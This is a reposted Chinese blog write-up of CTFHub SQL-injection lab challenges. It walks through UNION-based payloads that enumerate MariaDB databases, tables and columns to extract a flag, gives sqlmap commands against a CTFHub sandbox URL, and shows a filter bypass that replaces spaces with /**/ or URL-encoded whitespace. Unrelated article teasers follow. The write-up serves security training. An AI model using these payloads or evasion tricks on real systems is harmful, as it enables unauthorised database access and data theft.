CTFHub(web sql注入)(三)

MYSQL

手工注入

1.判断字段数

输入1

输入2

输入3

得知字段有两个

2.判断注入类型

1 and 1 = 1

1 and 1=2

回显错误,说明存在sql注入

3.查看数据库内容

知道字段数量为2后,可以查看数据库位置

1 union select 1,2

使用union select 1,2查看未发现数据,判断数据可能不存在数据库中,

在id=1中加入负号可以查看到不存在数据库中的数据

-1 union select 1,2

查看数据库版本

修改2为version(),查看数据库版本,发现数据库版本为MariaDB 10.3.22

-1 union select 1,version()

查看数据库名

修改2为database(),查看数据库名,发现数据库名为sqli

-1 union select 1,database()

查看全部数据库名

-1 union select 1,group_concat(schema_name)from information_schema.schemata

4.查看表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

sqli数据库中发现trbncnizbj和news两个表名(题目环境不同,得到的表名也不相同,注意修改)

5.查看字段名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='trbncnizbj'

查看trbncnizbj表中的全部字段名,发现一个数据名为iosfiklapu

6.查看flag

-1 union select 1,group_concat(iosfiklapu) from sqli.trbncnizbj

查看数据onwodzqnwq中的内容,发现此题flag

或者

3.爆数据库

123 union select 1,database()#

4.爆表名

123 union select 1,group_concat(table_name) from information_schema.tables where table_schema = 'sqli'

5.爆字段

vyaosuyeqw(题目环境不同,得到的表名也不相同,注意修改)

123 union select 1,group_concat(column_name) from information_schema.columns where table_name = 'vyaosuyeqw'

6.爆flag

rmutuveest

123 union select 1,rmutuveest from vyaosuyeqw

得到flag

sqlmap

http://challenge-6e2ef1d83f8dba0c.sandbox.ctfhub.com:10800

爆数据库名

sqlmap -u http://challenge-6e2ef1d83f8dba0c.sandbox.ctfhub.com:10800/?id=1 --dbs

爆表名

sqlmap -u http://challenge-6e2ef1d83f8dba0c.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

vyaosuyeqw

爆字段

vyaosuyeqw(题目环境不同,得到的表名也不相同,注意修改)

sqlmap -u http://challenge-6e2ef1d83f8dba0c.sandbox.ctfhub.com:10800/?id=1 -D sqli -T vyaosuyeqw --columns

爆出flag

rmutuveest

sqlmap -u http://challenge-6e2ef1d83f8dba0c.sandbox.ctfhub.com:10800/?id=1 -D sqli -T vyaosuyeqw -C rmutuveest --dump

CTFHub | MySQL结构_ctfhub mysql结构-CSDN博客

CTFHub技能树之WEB MYSQL结构_ctfhubmysql结构-CSDN博客

过滤空格

过滤了空格致使无法执行注入的语句时,可使用以下字符代替空格,发挥同样效果

():一对圆括号

+:加号

%09、%0a、%0b、%0c、%0d:TAB水平制表符、换行符、垂直制表符、换页、回车的URL编码形式

/**/:块注释符

题解

注入类型

输入1

构造payload and 1 = 1,发现页面提示Hacker!!!

对空格进行过滤,也就是payload语句中的空格需要使用字符进行过滤

/**/and/**/1/**/=/**/1

1/**/and/**/1/**/=/**/2

等于2时回显错误,说明此题存在过滤空格注入

字段数

使用order by 判断字段数量

1/**/order/**/by/**/1

1/**/order/**/by/**/2

1/**/order/**/by/**/3

使用order by 3,这里无回显,那么字段数量为2列

数据库

查看数据库位置

1/**/union/**/select/**/1,2

使用union select 1,2查看未发现数据

断数据可能不存在数据库中,在id=1中加入负号查看数据

-1/**/union/**/select/**/1,2

查看数据库版本

-1/**/union/**/select/**/1,version()

发现数据库版本为MariaDB 10.3.22

查看数据库名

-1/**/union/**/select/**/1,database()

发现数据库版本为sqli

查看全部数据库名

-1/**/union/**/select/**/1,group_concat(schema_name)from/**/information_schema.schemata

表名

在全部数据库名中发现sqli

-1/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'

最后在sqli数据库中发现uavxcnipfh和news两个表名(题目环境不同,得到的表名也不相同,注意修改)

字段

先查看uavxcnipfh表中的全部字段名,

-1/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema='sqli'/**/and/**/table_name='uavxcnipfh'

发现一个数据名为gmrdjzkbmr

flag

-1/**/union/**/select/**/1,group_concat(gmrdjzkbmr)/**/from/**/sqli.uavxcnipfh

查看数据gmrdjzkbmr中的内容,发现此题flag

CTFHub | 过滤空格_ctfhub过滤空格-CSDN博客

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/826219.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【Java基础】21.重写(Override)与重载(Overload)

文章目录 一、重写(Override)1.方法重写2.方法的重写规则3.Super 关键字的使用 二、重载(Overload)1.方法重载2.重载规则3.实例 三、重写与重载之间的区别 一、重写(Override) 1.方法重写 重写(Override)是指子类定义了一个与其父类中具有相同名称、参…

阿里云OSS 存储对象的注册与使用

目录 一、什么是阿里云OSS 二、 点击免费试用 2.1 选择第一个,点击免费试用 ​编辑 2.2 登录管理控制台 2.3 进入Bucket 2.4、在阿里云网站上的个人中心配置Accesskey,查询accessKeyId和accessKeySecret。 2.5、进入AccssKey管理页面应该会出现下图提示&…

连接共享打印机提示0x00000011b

步骤一:调出运行窗口,输入【regedit】调出注册表编辑器。步骤二:找到以下路径:【计算机\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print】。步骤三:鼠标右击——点击【新建】——选择【DWORD (32位&#…

基于TypeScript自定义Strapi users-permissions插件接口

Strapi的官方文档提供了扩展插件的方式,例如在src/extensions/users-permissions/strapi-server.ts中自定义,但文档提供的例子直接重写了原有插件的函数,而无法通过类似自定义API调用super.find()等方式调用原有插件的函数。 // 自定义API的…

Webservice使用教程

Webservice使用教程(jax-ws) Webservice的交互模式是一个类似于CS结构的模式,因此它需要一个Server端与一个Client端。在Client端访问Server端的接口来实现Webservice的功能。 Server端 打开IDEA创建gradle模块 webservice-01-server1 然后…

【VI/VIM】基本操作备忘录

简介 新建/打开文件 工作模式 常用命令 移动命令 文本选中 撤销、删除 复制粘贴 替换 缩排 查找 替换 插入 分屏 练习

【动态规划】C++简单多状态dp问题(打家劫舍、粉刷房子、买卖股票的最佳时机...)

文章目录 前言1. 前言 - 理解动态规划算法2. 关于 简单多状态的dp问题2.5 例题按摩师/打家劫舍 3. 算法题3.1_打家劫舍II3.2_删除并获得点数3.3_粉刷房子3.4_买卖股票的最佳时机含冷冻期3.5_买卖股票的最佳时机含手续费3.6_买卖股票的最佳时机III3.7_买卖股票的最佳时机IV 前言…

AcWing 800. 数组元素的目标和——算法基础课题解

AcWing 800. 数组元素的目标和 题目描述 给定两个升序排序的有序数组 A 和 B,以及一个目标值 x。 数组下标从 0 开始。 请你求出满足 A[i]B[j]x 的数对 (i,j)。 数据保证有唯一解。 输入格式 第一行包含三个整数 n,m,x,分别表示 A 的长度&#xf…

C# 语法全解总目录

C# 语法全解总目录 简介正文C#各大版本特性C# 语言类型C# 面向对象编程(一) 类相关(二) 继承 C#进阶(一) 委托(二) 事件(三) 元组(四) XML相关(五) 动态绑定 简介 记录C# 专栏所有文章的路径 正文 C#各大版本特性 C#各大版本特性 C# 语言类型 系列链接 C#语法系列:C# 语言类…

交换机的种类有哪些?主要都具有哪些作用?

在当今数字化时代,网络已经成为我们生活和工作中不可或缺的一部分。无论是家庭网络还是企业网络,都需要有效的网络设备来实现数据通信和资源共享。而网络交换机作为一种重要的网络设备,扮演着连接和管理网络设备的关键角色。本文将探讨交换机…

开源贡献代码之​探索一下CPython

探索一下Cython 本篇文章将会围绕最近给Apache提的一个feature为背景,展开讲讲CPython遇到的问题,以及尝试自己从0写一个库出来,代码也已经放星球了,感兴趣的同学可以去下载学习。 0.背景 最近在给apache arrow提的一个feature因为…

《TinyLlama: An Open-Source Small Language Model》全文翻译

【Title】 TinyLlama:开源小语言模型 【Abstract】 我们推出了 TinyLlama,这是一个紧凑的 1.1B 语言模型,在大约 1 万亿个令牌上进行了大约 3 个时期的预训练。 TinyLlama 基于 Llama 2(Touvron 等人,2023b&#xff…

VUE项目使用.env配置多种环境以及如何加载环境

第一步,创建多个环境配置文件 Vue CLI 项目默认使用 .env 文件来定义环境变量。你可以通过创建不同的 .env 文件来为不同环境设置不同的环境变量,例如: .env —— 所有模式共用.env.local —— 所有模式共用,但不会被 git 提交&…

C语言 三目运算符

C语言 逻辑分支语句中 还有一种 三目运算符 我们编写代码如下 #include <stdio.h>int main() {const char* a 1 1 ? "表达式1" : "表达式2";printf("%s", a);return 0; }这里 我们根据逻辑 先定义一个a 然后 它的值 等于一个 三目运算…

【CodeGeeX】国产的免费AI编程助手

CodeGeeX&#xff08;官网&#xff1a;https://codegeex.cn/&#xff09;是一款基于大模型的全能的智能编程助手。它可以实现代码的生成与补全、自动添加注释、代码翻译以及智能问答等功能&#xff0c;能够帮助开发者显著提高工作效率。CodeGeeX支持主流的编程语言&#xff0c;…

Serverless:程序员必须知道的云计算利器

作为一名程序员&#xff0c;你是否厌倦了管理服务器和基础设施的繁琐任务&#xff1f;Serverless 架构横空出世&#xff0c;解放你 khỏi这些负担&#xff0c;让你专注于编写代码。 什么是 Serverless&#xff1f; Serverless 是一种云计算模型&#xff0c;它允许你编写和部署…

C++练级之路——类和对象(下)

目录 1、构造函数初始化列表 2、类型转换 3、explicit关键字 4、static成员 5、友元 友元函数 友元类 6、内部类 7、匿名对象 8、拷贝构造时的一些编译器优化 差不多结束了&#xff0c;类和对象&#xff01; 1、构造函数初始化列表 初始化列表&#xff1a;以一个冒号…

python:元组,字符串,切片

一、元组# 列表可以修改内容&#xff0c;元组可以不被修改 # 在程序内封装数据&#xff0c;不希望数据被篡改&#xff0c;所以使用元组 # 语法&#xff1a; 不限制类型 # 定于元组的字面量&#xff1a; &#xff08;元素&#xff0c;元素&#xff0c;元素.....&#xff09; # 定…

萌新_1 环境安装(基于QQNT框架 Python Flask)

遇到问题加QQ群聊 群主在线解答 点击加入群聊【星辰开发】 一&#xff1a;安装QQ 目前为开发&#xff0c;推荐都安装到一台电脑上 直接安装到本地windows电脑&#xff0c; 优点方便开发 一键安装 Windows 用户一键安装方案 https://github.com/super1207/install_llob/rel…

LLMs——扩展数据受限的语言模型解决方案

概述 在自然语言处理&#xff08;NLP&#xff09;领域&#xff0c;大型语言模型的发展一直是研究的热点。这些模型通过增加参数数量和训练数据量来提升性能&#xff0c;但这种增长趋势是否会有一个极限&#xff1f;实际上&#xff0c;研究者们已经注意到&#xff0c;为了有效地…